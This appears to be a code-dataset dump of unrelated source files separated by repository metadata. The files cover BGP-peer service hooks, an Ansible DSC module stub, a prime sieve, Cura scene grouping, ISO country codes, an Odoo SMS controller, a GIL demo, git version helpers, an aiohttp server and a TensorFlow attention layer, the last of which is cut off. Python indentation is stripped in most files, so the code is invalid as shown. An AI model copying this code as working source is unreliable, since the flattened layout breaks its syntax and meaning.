#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
single-cpe-dual-wan-site
|
single-cpe-dual-wan-site-services
|
cpe-primary-wan
|
end-points
|
bgp-peers
Schema Representation:
/services/managed-cpe-services/customer/single-cpe-dual-wan-site/single-cpe-dual-wan-site-services/cpe-primary-wan/end-points/bgp-peers
"""
"""
Names of Leafs for this Yang Entity
BGP-peer-name
peer-ip
peer-description
remote-as
password
import-route-map
export-route-map
next-hop-self
soft-reconfiguration
default-originate
default-originate-route-map
send-community
encrypted-password
advertisement-interval
time-in-sec
timers
keepalive-interval
holdtime
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
from cpedeployment.bgppeer_lib import bgp_peer
from cpedeployment.bgppeer_lib import update_bgp_peer
class ServiceDataCustomization:
@staticmethod
def process_service_create_data(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the inputs"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
@staticmethod
def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the device bindings or Call the Business Login Handlers"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
devbindobjs = kwargs['devbindobjs']
for device in util.convert_to_list(dev):
bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_update_data(smodelctx, sdata, **kwargs):
"""callback called for update operation"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
dev = kwargs['dev']
for device in util.convert_to_list(dev):
update_bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_delete_data(smodelctx, sdata, **kwargs):
"""callback called for delete operation"""
modify = False
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
class DeletePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for Deletion"""
log('operations: %s' % (operations))
class CreatePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for creation"""
log('operations: %s' % (operations))
|
[
"[email protected]"
] | |
33342edc351835d96fc30b2229c64f36d1195aa5
|
0e25538b2f24f1bc002b19a61391017c17667d3d
|
/storefront/win_sfstore.py
|
182c135f774ac6bf02adb5b401eac608aa296006
|
[] |
no_license
|
trondhindenes/Ansible-Auto-Generated-Modules
|
725fae6ba9b0eef00c9fdc21179e2500dfd6725f
|
efa6ac8cd2b545116f24c1929936eb8cc5c8d337
|
refs/heads/master
| 2020-04-06T09:21:00.756651 | 2016-10-07T07:08:29 | 2016-10-07T07:08:29 | 36,883,816 | 12 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,533 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_sfstore
version_added:
short_description: Generated from DSC module storefront version 0.9.4 at 07.10.2016 01.23.53
description:
- The Storefront DSC resources can automate the deployment and configuration of Citrix Storefront 3.5. These DSC resources are provided AS IS, and are not supported through any means.
options:
AuthenticationServiceVirtualPath:
description:
-
required: True
default:
aliases: []
VirtualPath:
description:
-
required: True
default:
aliases: []
Ensure:
description:
-
required: False
default:
aliases: []
choices:
- Absent
- Present
FriendlyName:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
SiteId:
description:
-
required: False
default:
aliases: []
AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
- false
|
[
"[email protected]"
] | |
abf55a6e89c418a0d6cb8142f1025f77d7a05d97
|
3879d1ca43c573c209f962182cd1e7f7fe978fbf
|
/binarysearch/Generate-Primes/Generate-Primes.py
|
732a67fc393a9520ae82b86615fcb9d57bfa042b
|
[] |
no_license
|
DoctorLai/ACM
|
34a5600a5adf22660c5d81b2d8b7a358be537ecf
|
aefa170f74c55c1230eb6f352770512b1e3f469e
|
refs/heads/master
| 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 |
C++
|
UTF-8
|
Python
| false | false | 538 |
py
|
# https://helloacm.com/teaching-kids-programmaing-generate-prime-numbers-using-sieve-of-eratosthenes-algorithms/
# https://binarysearch.com/problems/Generate-Primes
# EASY, MATH
class Solution:
def solve(self, n):
isPrimes = [False] * 2 + [True] * (n - 1)
i = 2
while i * i <= n:
if isPrimes[i]:
j = i + i
while j <= n:
isPrimes[j] = False
j += i
i += 1
return [x for x in range(1, n + 1) if isPrimes[x]]
|
[
"[email protected]"
] | |
7e9bc8c8ada0baa06ab47fa561af1ba9a1656353
|
4e96f383d4703ad8ee58869ed91a0c8432c8a051
|
/Cura/Uranium/UM/Scene/GroupDecorator.py
|
683f4d0b12d57e068187742b233f7f8283baa708
|
[
"GPL-3.0-only",
"LGPL-3.0-only"
] |
permissive
|
flight7788/3d-printing-with-moveo-1
|
b2dba26010c4fa31815bc1d2d0966161a8600081
|
7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0
|
refs/heads/Feature_Marlin_with_AlanBoy
| 2022-08-30T18:36:44.785058 | 2020-05-30T07:52:58 | 2020-05-30T07:52:58 | 212,583,912 | 0 | 0 |
MIT
| 2020-05-16T07:39:47 | 2019-10-03T13:13:01 |
C
|
UTF-8
|
Python
| false | false | 1,777 |
py
|
from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
from UM.Scene.Selection import Selection
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from UM.Scene.SceneNode import SceneNode
class GroupDecorator(SceneNodeDecorator):
def __init__(self, remove_when_empty: bool = True) -> None:
super().__init__()
# Used to keep track of previous parent when an empty group removes itself from the scene.
# We keep this option so that it's possible to undo it.
self._old_parent = None # type: Optional[SceneNode]
self._remove_when_empty = remove_when_empty
def setNode(self, node: "SceneNode") -> None:
super().setNode(node)
if self._node is not None:
self._node.childrenChanged.connect(self._onChildrenChanged)
def isGroup(self) -> bool:
return True
def getOldParent(self) -> Optional["SceneNode"]:
return self._old_parent
def _onChildrenChanged(self, node: "SceneNode") -> None:
if self._node is None:
return
if not self._remove_when_empty:
return
if not self._node.hasChildren():
# A group that no longer has children may remove itself from the scene
self._old_parent = self._node.getParent()
self._node.setParent(None)
Selection.remove(self._node)
else:
# A group that has removed itself from the scene because it had no children may add itself back to the scene
# when a child is added to it.
if not self._node.getParent() and self._old_parent:
self._node.setParent(self._old_parent)
self._old_parent = None
def __deepcopy__(self, memo):
return GroupDecorator()
|
[
"[email protected]"
] | |
2f9bce858147dcf1996bd5661690506c4d32d259
|
d7fe33ef0959cf8d319db5e8c9d08b22ac100f50
|
/04_tavli/main/iso.py
|
0702a8fc0b4e479c0242e8db766984c6c5095ffb
|
[
"MIT"
] |
permissive
|
georstef/GoogleAppEngine
|
79aaa3a969457ea318c4d5e50258d7b424dff7cc
|
008845ec768926513b1e5219267ea12e184cf3be
|
refs/heads/master
| 2020-04-20T21:34:29.654551 | 2014-08-03T11:07:04 | 2014-08-03T11:07:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,179 |
py
|
# coding: utf-8
ISO_3166 = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia',
'BQ': 'Bonaire',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': "Côte d'Ivoire",
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'North Korea',
'KR': 'South Korea',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': "Lao People's Democratic Republic",
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russia',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela',
'VN': 'Vietnam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
|
[
"[email protected]"
] | |
85566a279360d8fee75c2ed3b6a5c4fe6426afc1
|
30d360f965253167c99f9b4cd41001491aed08af
|
/PTFE_code/integrate_profile.py
|
4ba0587d6305af16574d6b5b2d36c2e9a6d5dba3
|
[] |
no_license
|
petervanya/PhDcode
|
d2d9f7170f201d6175fec9c3d4094617a5427fb5
|
891e6812a2699025d26b901c95d0c46a706b0c96
|
refs/heads/master
| 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,856 |
py
|
#!/usr/bin/env python
"""Usage: integrate_profile.py <profile> <d> [--L <L>]
[AD HOC] Load 1d water profile and integrate
volume of water in polymer and in electrodes.
Arguments:
<file> Water profile, columns [r, f]
<d> Slab width in nm
Options:
--L <L> Box size in DPD units [default: 40]
09/11/16
"""
import numpy as np
from scipy.integrate import simps
import sys
from docopt import docopt
rc = 8.14e-10
if __name__ == "__main__":
args = docopt(__doc__)
L = float(args["--L"])
d_nm = float(args["<d>"])
d = d_nm * 1e-9 / rc
try:
A = np.loadtxt(args["<profile>"])
except FileNotFoundError:
sys.exit("No file found: %s." % args["<profile>"])
r, f = A[:, 0], A[:, 1]
if d < 0.0 or d > L:
sys.exit("Slab width larger than box size.")
print("===== Integrating water profile =====")
print("L: %.2f | slab width: %.2f (%.2f nm)" % (L, d, d_nm))
dr = r[1] - r[0]
re1 = r[r < (L-d)/2]
re2 = r[r > (L+d)/2]
rm = r[(r >= (L-d)/2) & (r <= (L+d)/2)]
fe1 = f[r < (L-d)/2]
fe2 = f[r > (L+d)/2]
fm = f[(r >= (L-d)/2) & (r <= (L+d)/2)]
water_film = simps(fm, dx=dr)
water_elec = simps(fe1, dx=dr) + simps(fe2, dx=dr)
water_tot = simps(f, dx=dr)
print("Total water: %.2f" % water_tot)
print("Electrodes: %.2f | Film: %.2f | mat / el: %.2f" % \
(water_elec, water_film, water_film / water_elec))
R = water_film / (water_film + water_elec)
print("Ratio of water in the film: %.2f" % R)
# water_film = np.sum(fm) * dr
# water_elec = (np.sum(fe1) + np.sum(fe2)) * dr
# water_tot = np.sum(f) * dr
#
# print("Naive quadrature | Total water: %.2f" % water_tot)
# print("Electrodes: %.2f | Matrix: %.2f | mat / el: %.2f" % \
# (water_elec, water_film, water_film / water_elec))
|
[
"[email protected]"
] | |
0bea389e510b7977e448170db9a97655fd4abd53
|
7b4e9342d42be2b55af5dc23a8abedd672d68e99
|
/MobileApps/libs/flows/mac/smart/screens/printersettings/printer_from_other_devices.py
|
96ab7c3b1a277a1e82cb0c00364ddd13f515ba52
|
[] |
no_license
|
Amal548/QAMA
|
af5bb335c92a90b461f1ee9a3870435d83d46802
|
b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5
|
refs/heads/master
| 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,596 |
py
|
# encoding: utf-8
'''
Description: It defines the operations of element and verification methods on
the printer from other devices screen.
@author: Sophia
@create_date: Sep 18, 2019
'''
import logging
from MobileApps.libs.flows.mac.smart.screens.smart_screens import SmartScreens
from MobileApps.libs.flows.mac.smart.screens.printersettings.printer_setting_scroll import PrinterSettingScroll
class PrinterFromOtherDevices(PrinterSettingScroll, SmartScreens):
folder_name = "printersettings"
flow_name = "print_from_other_devices"
def __init__(self, driver):
'''
This is initial method for class.
:parameter:
:return:
'''
super(PrinterFromOtherDevices, self).__init__(driver)
# -------------------------------Operate Elements------------------------------
def wait_for_screen_load(self, timeout=30, raise_e=True):
'''
This is a method to wait print from other devices screen load correctly
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[wait_for_screen_load]-Wait for screen loading... ")
return self.driver.wait_for_object("send_link_btn", timeout=timeout, raise_e=raise_e)
def click_send_link_btn(self):
'''
This is a method to click send link button.
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[click_send_link_btn]-Click send link button... ")
self.driver.click("send_link_btn")
# -------------------------------Verification Methods--------------------------
|
[
"[email protected]"
] | |
89dece8d86d548eb18d50cf9020cc5d85d9c4d93
|
4b4d21f6a2aaf8cb0ece595e4aaf9cb705ffdd49
|
/marketing_message/controllers/controllers.py
|
c83db22f29b37ed9ac02bcf44de219ae2e23a33a
|
[] |
no_license
|
sc4you/odoo-project-10.0
|
e8c82b4cd42c0672e996561e75e0f9d0717821fa
|
bca7e400b6316bcbcefe6f0d088cb97a28f644bb
|
refs/heads/master
| 2020-03-21T13:41:08.042847 | 2018-05-15T07:41:58 | 2018-05-15T07:41:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,270 |
py
|
# -*- coding: utf-8 -*-
import babel.dates
import time, json
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
import werkzeug.urls
from werkzeug.exceptions import NotFound
import random
from odoo import http
from odoo import tools
from odoo.http import request
from odoo.tools.translate import _
from odoo.exceptions import UserError, ValidationError
import httplib
import urllib
import json
# 服务条款
class SmsEvent(http.Controller):
def __init__(self):
param = request.env()['ir.config_parameter']
self.account = param.get_param('account') or ''
self.password = param.get_param('password') or ''
self.host_sign = param.get_param('host_sign') or ''
self.host_marketing = param.get_param('host_marketing') or ''
self.sms_heard = param.get_param('sms_heard') or ''
# 发送请求
def send_post(self, datas, host, sms_send_uri):
try:
datas = json.dumps(datas)
"""发送post请求"""
headers = {"Content-type": "application/json"}
conn = httplib.HTTPConnection(host, port=80, timeout=30)
conn.request("POST", sms_send_uri, datas, headers)
response = conn.getresponse()
response_str = response.read()
conn.close()
return response_str
except Exception:
return False
# 发送短信验证码
def commit_send_message(self, tel, code):
sms_send_uri = "/msg/variable/json"
phone = tel
code = code
params = phone + ',' + code
msg = self.sms_heard + u"您好!验证码是:{$var}"
print self.account
print self.account
datas = {
'account': self.account,
'password': self.password,
'msg': msg,
'params': params
}
send_result = self.send_post(datas, self.host_sign, sms_send_uri)
print send_result
if not send_result:
return False
else:
sort_data = json.loads(send_result)
print sort_data
if int(sort_data["code"]) == 0:
return code
else:
raise UserError(_(sort_data['errorMsg']))
|
[
"[email protected]"
] | |
0961c7df4a2719e2dfeeece2c5a57cf3f59e263c
|
2cb507ecd6629b9ff457a36e462f987913d94c1a
|
/python核心技术与实战/23/gil.py
|
f3ccf2898fadf6e776549b48a927183257a39720
|
[
"Apache-2.0"
] |
permissive
|
youaresherlock/PythonPractice
|
6869e0a5949675198826e5a07552237a636d6f5b
|
2e22d3fdcb26353cb0d8215c150e84d11bc9a022
|
refs/heads/master
| 2021-08-16T03:09:44.203035 | 2021-08-02T07:40:00 | 2021-08-02T07:40:00 | 146,625,560 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
#!usr/bin/python
# -*- coding:utf8 -*-
import time
from threading import Thread
import sys
import threading
# 单线程版
def CountDown(n):
while n > 0:
n -= 1
if __name__ == "__main__":
n = 3000000
start_time = time.perf_counter()
CountDown(n)
end_time = time.perf_counter()
print("n = {},单线程版耗时{}".format(n, end_time-start_time))
# 多线程版
start_time = time.perf_counter()
t1 = Thread(target=CountDown, args = [n//2])
t2 = Thread(target=CountDown, args = [n//2])
t1.start()
t2.start()
t1.join()
t2.join()
end_time = time.perf_counter()
print("n = {},多线程版耗时{}".format(n, end_time-start_time))
# 对象引用计数
for k in range(100):
a = []
b = a
print(sys.getrefcount(a))
# 线程安全
n = 0
def foo():
global n
n += 1
threads = []
for i in range(100):
t = threading.Thread(target=foo)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
print(n)
|
[
"[email protected]"
] | |
58ce61b7f582ce7941345cabdd91cbb99c06692c
|
78ee2d20722287f547c406a1cff1efc36d020ba3
|
/flare_portal/versioning.py
|
b5ae7e3705b2d24587dd22d5d6233ad8eded23e8
|
[
"MIT"
] |
permissive
|
flare-kcl/flare-portal
|
db660b4ccc39a6f125d548fc9efb21026f097563
|
a1cef9d22ba3f1bafac55bb6ee1c8223425101dd
|
refs/heads/main
| 2023-07-24T10:00:27.807734 | 2022-07-19T02:08:38 | 2022-07-19T02:08:38 | 305,943,258 | 1 | 2 |
MIT
| 2023-07-03T14:40:33 | 2020-10-21T07:30:12 |
Python
|
UTF-8
|
Python
| false | false | 2,608 |
py
|
"""Provides functions to fetch versions from Git
Copied from Raven Python
https://github.com/getsentry/raven-python/blob/d7d14f61b7fb425bcb15512f659626648c494f98/raven/utils/compat.py
"""
import os.path
class InvalidGitRepository(Exception):
pass
def fetch_git_sha(path: str, head: str = None) -> str:
"""
>>> fetch_git_sha(os.path.dirname(__file__))
"""
if not head:
head_path = os.path.join(path, ".git", "HEAD")
if not os.path.exists(head_path):
raise InvalidGitRepository(
"Cannot identify HEAD for git repository at %s" % (path,)
)
with open(head_path, "r") as fp:
head = str(fp.read()).strip()
if head.startswith("ref: "):
head = head[5:]
revision_file = os.path.join(path, ".git", *head.split("/"))
else:
return head
else:
revision_file = os.path.join(path, ".git", "refs", "heads", head)
if not os.path.exists(revision_file):
if not os.path.exists(os.path.join(path, ".git")):
raise InvalidGitRepository(
"%s does not seem to be the root of a git repository" % (path,)
)
# Check for our .git/packed-refs' file since a `git gc` may have run
# https://git-scm.com/book/en/v2/Git-Internals-Maintenance-and-Data-Recovery
packed_file = os.path.join(path, ".git", "packed-refs")
if os.path.exists(packed_file):
with open(packed_file) as fh:
for line in fh:
line = line.rstrip()
if line and line[:1] not in ("#", "^"):
try:
revision, ref = line.split(" ", 1)
except ValueError:
continue
if ref == head:
return str(revision)
raise InvalidGitRepository(
'Unable to find ref to head "%s" in repository' % (head,)
)
with open(revision_file) as fh:
return str(fh.read()).strip()
def fetch_package_version(dist_name: str) -> str:
"""
>>> fetch_package_version('sentry')
"""
try:
# Importing pkg_resources can be slow, so only import it
# if we need it.
import pkg_resources
except ImportError:
# pkg_resource is not available on Google App Engine
raise NotImplementedError(
"pkg_resources is not available " "on this Python install"
)
dist = pkg_resources.get_distribution(dist_name)
return dist.version
|
[
"[email protected]"
] | |
ea5d5e55d54477a28c3d0d03081e37950effcb73
|
ca17adac27ce0fc199a111db0e786bdbfd24f849
|
/02-asyncio-basic/e02-http-server.py
|
fa21cd3155f88612807884c45b0db4c6eeb30ad7
|
[] |
no_license
|
genzj/asyncio-training-course
|
862c1edb19bd3d25cb8a927fdb9942a9838c8d80
|
34e72a51f79945709fbd496391295e7cd92ec8e1
|
refs/heads/master
| 2023-08-08T05:25:01.438483 | 2023-07-17T08:53:59 | 2023-07-17T08:59:14 | 150,000,887 | 1 | 2 | null | 2023-07-25T23:36:11 | 2018-09-23T16:05:10 |
Python
|
UTF-8
|
Python
| false | false | 353 |
py
|
# -*- encoding: utf-8 -*-
from aiohttp import web
async def handle(request):
name = request.match_info.get('name', "Anonymous")
text = "Hello, " + name
return web.Response(text=text)
app = web.Application()
app.add_routes([web.get('/', handle),
web.get('/{name}', handle)])
web.run_app(app, host='127.0.0.1', port=5000)
|
[
"[email protected]"
] | |
58f4c40eb8c52f99c0002350e82dc95a31f3baa3
|
180dc578d12fff056fce1ef8bd1ba5c227f82afc
|
/official/legacy/transformer/attention_layer.py
|
fcdce774b03f1b27cdf8350104946a44372bf458
|
[
"Apache-2.0"
] |
permissive
|
jianzhnie/models
|
6cb96c873d7d251db17afac7144c4dbb84d4f1d6
|
d3507b550a3ade40cade60a79eb5b8978b56c7ae
|
refs/heads/master
| 2023-07-12T05:08:23.314636 | 2023-06-27T07:54:20 | 2023-06-27T07:54:20 | 281,858,258 | 2 | 0 |
Apache-2.0
| 2022-03-27T12:53:44 | 2020-07-23T05:22:33 |
Python
|
UTF-8
|
Python
| false | false | 7,119 |
py
|
# Copyright 2023 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of multiheaded attention and self-attention layers."""
import math
import tensorflow as tf
from official.modeling import tf_utils
class Attention(tf.keras.layers.Layer):
"""Multi-headed attention layer."""
def __init__(self, hidden_size, num_heads, attention_dropout):
"""Initialize Attention.
Args:
hidden_size: int, output dim of hidden layer.
num_heads: int, number of heads to repeat the same attention structure.
attention_dropout: float, dropout rate inside attention for training.
"""
if hidden_size % num_heads:
raise ValueError(
"Hidden size ({}) must be divisible by the number of heads ({})."
.format(hidden_size, num_heads))
super(Attention, self).__init__()
self.hidden_size = hidden_size
self.num_heads = num_heads
self.attention_dropout = attention_dropout
def build(self, input_shape):
"""Builds the layer."""
# Layers for linearly projecting the queries, keys, and values.
size_per_head = self.hidden_size // self.num_heads
def _glorot_initializer(fan_in, fan_out):
limit = math.sqrt(6.0 / (fan_in + fan_out))
return tf.keras.initializers.RandomUniform(minval=-limit, maxval=limit)
attention_initializer = _glorot_initializer(input_shape.as_list()[-1],
self.hidden_size)
self.query_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="query")
self.key_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="key")
self.value_dense_layer = tf.keras.layers.EinsumDense(
"BTE,ENH->BTNH",
output_shape=(None, self.num_heads, size_per_head),
kernel_initializer=tf_utils.clone_initializer(attention_initializer),
bias_axes=None,
name="value")
output_initializer = _glorot_initializer(self.hidden_size, self.hidden_size)
self.output_dense_layer = tf.keras.layers.EinsumDense(
"BTNH,NHE->BTE",
output_shape=(None, self.hidden_size),
kernel_initializer=output_initializer,
bias_axes=None,
name="output_transform")
super(Attention, self).build(input_shape)
def get_config(self):
return {
"hidden_size": self.hidden_size,
